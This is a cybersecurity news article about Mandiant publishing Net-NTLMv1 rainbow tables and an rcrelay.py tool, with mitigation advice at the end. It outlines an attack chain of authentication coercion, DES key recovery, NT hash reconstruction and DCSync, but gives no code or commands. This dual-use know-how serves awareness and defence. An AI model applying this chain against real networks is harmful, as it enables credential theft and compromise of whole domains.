Mandiant has released a large set of rainbow tables dedicated to Net-NTLMv1 with the aim of concretely demonstrating how insecure this authentication protocol has become. Although Net-NTLMv1 has been deprecated for years and its weaknesses are widely documented, the company’s consultants continue to detect its use in operational enterprise environments.
According to Mandiant, the persistence of this legacy protocol is often due to organizational inertia and the difficulty of demonstrating immediate and tangible risk. The publication of the dataset aims to reduce this barrier, providing the community with practical tools to demonstrate the actual ease with which Net-NTLMv1 can be exploited.
The weaknesses of Net-NTLMv1 have been known since at least the late 1990s, when the first cryptographic analyses of the protocol were published. In 2012, during DEFCON 20, the security community publicly reiterated the inadequacy of this authentication mechanism compared to modern standards.
A significant step forward occurred on August 30, 2016, when Hashcat introduced support for reconstructing the NT hash from recovered DES keys. This feature made it quicker to complete the attack chain, allowing the obtained keys to be transformed into directly reusable credentials.
The concept of rainbow tables is not new either: the first formal study dates back to 2003, by Philippe Oechslin, based on the time-memory compromise introduced by Martin Hellman as early as 1980.
Net-NTLMv1 uses three DES keys derived from the password hash. Without Extended Session Security (ESS), if an attacker intercepts a Net-NTLMv1 response associated with a known plaintext—such as the static value 1122334455667788—a known plaintext attack becomes possible.
This feature allows for the recovery of cryptographic material used during authentication. Because this material corresponds to the password hash of the affected Active Directory object, the results can be immediately exploited to compromise user or computer accounts, frequently resulting in privilege escalation.
A particularly critical case is when authentication is forced by a domain controller. Retrieving the DC’s machine account password hash could allow DCSync operations and lead to the compromise of the entire Active Directory domain.
The rainbow table set published by Mandiant is available through Google Cloud Storage and can be stored entirely on a single 2 TB SSD, costing approximately $130. The provided SHA512 checksums allow you to verify its integrity before use.
The dataset release is accompanied by rcrelay.py , a tool integrated into an updated fork of RainbowCrack. This tool automates the lookup of rainbow tables as soon as a Net-NTLMv1 hash is intercepted, eliminating much of the manual work previously required.
According to Mandiant, this integration dramatically reduces attack complexity and highlights how indefensible Net-NTLMv1 has become in modern environments.
To obtain Net-NTLMv1 hashes, an attacker can trick Windows systems into authenticating to a controlled host by forcing the use of the protocol. In the blog post, Mandiant cites PetitPotam as an example of an authentication coercion technique used to generate incoming connections, including those from domain controllers.
Splitting the Net-NTLMv1 hash into its DES components is not an optional step, but an intrinsic feature of the protocol itself. Tools like rcrelay.py automatically handle this logic during the lookup phase.
The published rainbow tables cover the first two DES keys, each 7 bytes long. The third key, only 2 bytes long, is so small that it can be brute-forced in fractions of a second and is therefore excluded from the dataset.
Once all the components are obtained, Hashcat allows you to reconstruct the final NT hash of the compromised account, making it immediately usable for subsequent attacks, such as DCSync, using tools from the Impacket suite.
Mandiant recommends immediately disabling Net-NTLMv1 in all environments. Proper configuration requires the exclusive use of NTLMv2, which can be applied via both local computer policies and Group Policy.
Because these are local settings, an attacker with administrative privileges could temporarily restore a vulnerable state. Therefore, in addition to disabling them, it’s essential to monitor protocol usage.
This can be checked by analyzing the security logs, especially events with ID 4624. If the authentication package field displays “LM” or “NTLMv1,” this indicates that an outdated mechanism was used that requires immediate action.
Follow us on Google News to receive daily updates on cybersecurity. Contact us if you would like to report news, insights or content for publication.
